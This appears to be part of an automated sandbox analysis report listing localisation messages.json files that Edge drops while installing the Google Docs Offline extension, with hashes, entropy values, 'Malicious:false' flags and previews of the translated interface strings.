                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                        MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                        SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                        SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                        SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                        MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                        SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                        SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                                        SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):972
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                        MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                        SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                        SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                        SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):990
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                                        MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                                        SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                                        SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                                        SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                                        MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                                        SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                                        SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                                        SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1672
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                                        MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                                        SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                                        SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                                        SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):935
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                                        MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                                        SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                                        SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                                        SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                                        MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                                        SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                                        SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                                        SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2771
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                                        MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                                        SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                                        SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                                        SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):858
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                                        MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                                        SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                                        SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                                        SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):954
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                                        MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                                        SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                                        SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                                        SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):899
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                                        MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                                        SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                                        SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                                        SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2230
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                                        MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                                        SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                                        SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                                        SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                                        Malicious:false
